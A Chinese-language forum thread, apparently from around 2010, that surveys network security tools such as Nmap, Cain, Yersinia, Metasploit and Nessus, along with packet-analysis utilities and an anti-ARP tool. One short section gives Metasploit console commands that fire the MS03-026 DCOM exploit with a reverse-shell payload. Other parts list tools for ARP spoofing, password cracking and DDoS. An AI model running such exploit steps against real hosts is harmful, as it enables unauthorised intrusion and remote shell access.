精典防火墙及安全测试工具

network

经典扫描工具：
NMAP：(windows平台)
NMAP -v -A 1.1.1.1  判断对方操作系统和端口
dsniff (linux)
抓密码，arp spoofing,dns spoofing,webspy ,功能强大


经典2层工具软件：yersinia (linux平台)
可以做mac flooding , dhcp starvation , stp, 802.1x , dtp , hsrp,cdp,vlan hooping攻击。

Cain (windows)



可以网络嗅探，网络欺骗，破解加密口令、解码被打乱的口令、显示口令框、显示缓存口令和分析路由协议，甚至还可以监听内网中他人使用VOIP拨打电话。


密码的破解


Cain还具有强大的破解功能，可以破解md5,md4,pwl,mssql等加密的密文




7层攻击软件
Metasploit 3 （windows平台)

内置了很多漏洞可以在线升级。
例子：

show exploit  －查看可以攻击的漏洞
use msrpc_dcom_ms03_026 调用WIN里面的某个服务
show option  ---查看需要攻击的选项
show PAYLOAD ----攻击调用的shell
set PAYLOAD win32_reverse  调用shell
set RHOST 192.168.1.102
set LHOST  192.168.1.100
exploit ---进行攻击
show target --选择操作系统
set target 0

network

•交换机攻击：Yersinia
•路由器攻击：Quagga(zebra/ripd/ospfd/bgpd)
•DDos攻击：AttackManager
•ARP攻击：Ettercap、Arpmim
•TCP攻击：Tcphijack
•扫描工具：Nmap、Nikto
•其它：dsniff、nemesis、httptunnel、udptunnel、hping2、sendip、arpwatch

network

NESSUS  文档.
相当不错。建议高标准掌握

游客，如果您要查看本帖隐藏内容请回复

　Nessus 被认为是目前全世界最多人使用的系统漏洞扫描与分析软件。总共有超过75,000个机构使用 Nessus 作为扫描该机构电脑系统的软件。


　　1998年, Nessus 的创办人 Renaud Deraison 展开了一项名为 "Nessus"的计划，其计划目的是希望能为因特网社群提供一个免费、威力强大、更新频繁并简易使用的远端系统安全扫瞄程序。经过了数年的发展, 包括 CERT 与 SANS 等著名的网络安全相关机构皆认同此工具软件的功能与可用性。


　　2002年时, Renaud 与 Ron Gula, Jack Huffard 创办了一个名为 Tenable Network Security 的机构。在第三版的Nessus 发布之时, 该机构收回了 Nessus 的版权与程序源代码 (原本为开放源代码), 并注册了 nessus.org 成为该机构的网站。 目前此机构位于美国马里兰州的哥伦比亚。
[编辑本段]
Nessus的特色
　　* 提供完整的电脑漏洞扫描服务, 并随时更新其漏洞数据库。


　　* 不同于传统的漏洞扫描软件, Nessus 可同时在本机或远端上摇控, 进行系统的漏洞分析扫描。


　　* 其运作效能能随着系统的资源而自行调整。如果将主机加入更多的资源(例如加快CPU速度或增加内存大小),其效率表现可因为丰富资源而提高。


　　* 可自行定义插件(Plug-in)


　　* NASL(Nessus Attack Scripting Language) 是由 Tenable 所开发出的语言，用来写入Nessus的安全测试选项。


　　* 完整支持SSL (Secure Socket Layer)。


　　* 自从1998年开发至今已谕十年, 故为一架构成熟的软件。
[编辑本段]
Nessus 2 安装方法
　　在类UNIX的操作系统上(包含Linux), Nessus 并没有像 Windows Installation Shield 之类的软件一样, 提供一个图形化的安装接口。以下是简易的 Nessus 2 安装方法:


　　1. 首先必须从 http://www.nessus.org/download/ 下载以下四个档案


　　* nessus-libraries-x.x.tar.gz


　　* libnasl-x.x.tar.gz


　　* nessus-core.x.x.tar.gz


　　* nessus-plugins.x.x.tar.gz


　　请注意, 以下所要进行的编译(Compilation), 需要依照以上软件的次序。


　　2. 在Terminal环境下输入以下指令:


　　cd nessus-libraries


　　./configure


　　make


　　make install


　　Installing libnasl


　　cd libnasl


　　./configure


　　make


　　依次序将四个软件包编译完成。


　　若您使用的操作系统是Linux, 请确认文件夹 /usr/local/lib 中有存在 /etc/ld.so.conf 文件。 并输入


　　ldconfig.


　　SUN Solaris 系统的使用者请输入以下指令 :


　　export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/lib


　　安装即可完成。
[编辑本段]
Nessus简易使用说明
　　1. 执行Nessus。


　　2. 在Plugins的选单画面中, 选取您希望分析的漏洞的服务类型, 例如拒绝服务式攻击(DoS)。


　　3. 在Scan Options的菜单中,


　　* Port Range: 输入您希望扫描的端口(Port)范围


　　* Optimize the test: 优化您的扫描程序。建议选取。


　　其他选项建议保持默认。


　　4. 在 Target Selection 选单当中, 输入您希望扫描的主机IP地址


　　5. 按 "Start Scan" 开始扫描。
[编辑本段]
官方网站
　　http://www.nessus.org/




扩展阅读： 1.http://www.nessus.org/ 2.http://www.edgeos.com/nessuskb/ 3.http://www.nessus.org/documentation/nessus_3.0_installation_guide.pdf 4.http://www.nessus.org/plugins/index.php?view=faq 5.http://www.nessus.org/documentation/nessus_3.0_client_guide.pdf

network

NAMP文档

游客，如果您要查看本帖隐藏内容请回复

有这么一个工具，几乎每一个做网络安全的人都肯定会用到。它就是Nmap 。Nmap软件开发者为这一版本做出了辛苦的劳动，其中包括一些非常酷的东西，如Nmap的脚本引擎(NSE)，我们甚至用它来检测机器是否感染了Conficker蠕虫。
还有很多其他整洁的新功能和改进，大家可以前往http://nmap.org/5/下载新版Nmap 。
一位在360工作的安全工程师茄子表示：这个已经算是个迷你版的Nessus了，并可以支持LUA这类复杂的脚本。

Nmap (“Network Mapper(网络映射器)”) 是一款开放源代码的 网络探测和安全审核的工具。它的设计目标是快速地扫描大型网络，当然用它扫描单个 主机也没有问题。Nmap以新颖的方式使用原始IP报文来发现网络上有哪些主机，那些 主机提供什么服务(应用程序名和版本)，那些服务运行在什么操作系统(包括版本信息)， 它们使用什么类型的报文过滤器/防火墙，以及一堆其它功能。虽然Nmap通常用于安全审核， 许多系统管理员和网络管理员也用它来做一些日常的工作，比如查看整个网络的信息， 管理服务升级计划，以及监视主机和服务的运行。
Nmap输出的是扫描目标的列表，以及每个目标的补充信息，至于是哪些信息则依赖于所使用的选项。 “所感兴趣的端口表格”是其中的关键。那张表列出端口号，协议，服务名称和状态。状态可能是 open(开放的)，filtered(被过滤的)， closed(关闭的)，或者unfiltered(未被过滤的)。 Open(开放的)意味着目标机器上的应用程序正在该端口监听连接/报文。 filtered(被过滤的) 意味着防火墙，过滤器或者其它网络障碍阻止了该端口被访问，Nmap无法得知 它是 open(开放的) 还是 closed(关闭的)。 closed(关闭的) 端口没有应用程序在它上面监听，但是他们随时可能开放。 当端口对Nmap的探测做出响应，但是Nmap无法确定它们是关闭还是开放时，这些端口就被认为是 unfiltered(未被过滤的) 如果Nmap报告状态组合 open|filtered 和 closed|filtered时，那说明Nmap无法确定该端口处于两个状态中的哪一个状态。 当要求进行版本探测时，端口表也可以包含软件的版本信息。当要求进行IP协议扫描时 (-sO)，Nmap提供关于所支持的IP协议而不是正在监听的端口的信息。

http://nmap.org/man/zh/

network

metasploit Hacker framework 这个经典测试安全性工具，要知道思科的IPS产品的特征库都是跟着这个META公司的库同步的

network

IPS测试工具——Traffic IQ Pro

network

SnifferMate 1.3 发布
拖了很长时间，终于正式发布

增加的功能
Trace File合并、切分
转换更多格式

已经有的功能
Trace File转换
输出Excel 2007报表
Windows 7/Vista中的Trace文件预览
....
一项项以后逐个说

下载请至
http://www.netexpert.cn/dali/?p=25

下载以后，需要到
http://www.netis.com.cn/sniffermate/smapply/
免费申请个序列号

过去安装过BoneLight的用户需要先手工删除BoneLight

network

Dali 0.6.1发布
在此发布Dali，一个新的分析工具

具体介绍在 http://www.netexpert.cn/dali



SnifferMate 1.3 发布

发布者:admin 于 2009-12月-31 | 4个评论 »

以前的BoneLight如今升级叫做 SnifferMate
下载 SnifferMate 1.3.1 - 分析伴侣
下载以后别忘记去 http://www.netis.com.cn/sniffermate/smapply/ 花三秒钟免费申请个序列号

归档于未分类

Dali 0.6.1 发布

发布者:admin 于 2009-12月-22 | 无评论 »

Dali是一个新工具，调整了协议分析的视角，针对关键的应用进行分析和解析。Dali大幅度改变了协议分析中对流的理解，着重加强了对于网络流视角的支持。今天发布的是0.6.1版本，也是首个向大众公开的早期测试版本。

Dali能够

• 对TCP流传输效率进行深入解析
• 对协议、应用进行快速树状统计
• 对关键性能指标进行历史观测
• 面向应用的原生解码库
• 调用第三方解码库和过滤器

Dali还能够对http/email等协议进行应用层展现，帮助我们进行关键应用的分析。
目前的dali仍然处在非常早期的版本，所以参与下载使用的同仁需要有志愿者的觉悟
我们会不断努力改善dali的设计和完善程度，希望提供一个很有用的工具，enjoy it.

下载：Dali Flow Analyzer 0.6.1 - 面向关键应用的协议流分析
同时为了给Dali提供更强有力的解码库，可以下载http://www.netexpert.cn/wireshark/的wireshark UTF-8的中文核心版本。WireShark安装完毕后，Dali会自动调用Wireshark的解码库资源。源代码也可以在该页面上下载。
–

network

发布《网络分析专家论坛精华选集2 (2008版)》发布《网络分析专家论坛精华选集2 (2008)》
感谢大家三年多来的支持，之前整理过《网络分析专家论坛精华选集一》，这次进一步整理更多有意义的精华文章。

受限于精力和制作水平，目前的选集仍然只是论坛里优秀原创文章的极小的一部分。
希望以后能够不断发布更多选集。

借这个机会再次向所有台前幕后的英雄表示感谢
下载链接

network

IP与MAC扫描工具

IP-MAC对应扫描.rar (177.87 KB, 下载次数: 2)

2010-1-21 15:31 上传

点击文件名下载附件

Anti ARP Sniffer一款小巧的防ARP攻击工具.
1、Anti ARP Sniffer 可100%防御所有利用ARP 技术的恶意程序，发现疑常并能自动重写ARP数据。  
2、Anti ARP Sniffer 具备追踪ARP攻击者的功能,能够追踪对方的IP地址。  
3、Anti ARP Sniffer可自动修复ARP数据,并保持网络永不中断。  
4、Anti ARP Sniffer能自动获取本机发送与接受的广播包数量。

AntiARPSniffer3.part1.rar (781.25 KB, 下载次数: 0)

2010-1-21 15:34 上传

点击文件名下载附件

AntiARPSniffer3.part2.rar (781.25 KB, 下载次数: 0)

2010-1-21 15:34 上传

点击文件名下载附件

AntiARPSniffer3.part3.rar (515.06 KB, 下载次数: 0)

2010-1-21 15:34 上传

点击文件名下载附件